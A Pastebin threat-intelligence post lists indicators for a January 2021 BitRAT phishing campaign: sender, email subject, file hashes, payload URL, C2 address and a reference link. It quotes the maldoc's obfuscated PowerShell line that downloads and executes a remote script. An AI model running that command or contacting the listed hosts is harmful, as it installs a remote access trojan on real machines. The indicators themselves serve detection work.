Advertisement
ExecuteMalware

2021-01-07 BitRAT IOCs

Jan 11th, 2021 (edited)
4,551
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.68 KB | None | 0 0
  1. THREAT ATTRIBUTION: BITRAT
  2.  
  3. SUBJECTS OBSERVED
  4. Re: Payment copy attached for SOA
  5.  
  6. SENDERS OBSERVED
  7. Anthony Reves <info@trockenbau-buechler.de>
  8.  
  9. DOCUMENT FILE HASHES
  10. Scanned_25526662-Payment.xls
  11. cd7d4543958945e3fab4f0631e3494f3
  12.  
  13. Sparc.jpg (This is a PowerShell script)
  14. a8f7e8a8a64608d0493a660d93adff1c
  15.  
  16. PAYLOAD FILE HASHES
  17. Test3.jpg
  18. 19387b30d6dbe83e31d3cac884280d93
  19.  
  20. POWERSHELL FROM MALDOC
  21. cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
  22.  
  23. BITRAT PAYLOAD DISTRIBUTION URLS FROM POWERSHELL/VB
  24. http://lankarecipes.com/Sparc.jpg
  25.  
  26. BITRAT C2
  27. 45.15.143.216:5210
  28.  
  29. SUPPORTING EVIDENCE
  30. https://urlhaus.abuse.ch/url/950978/
  31.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement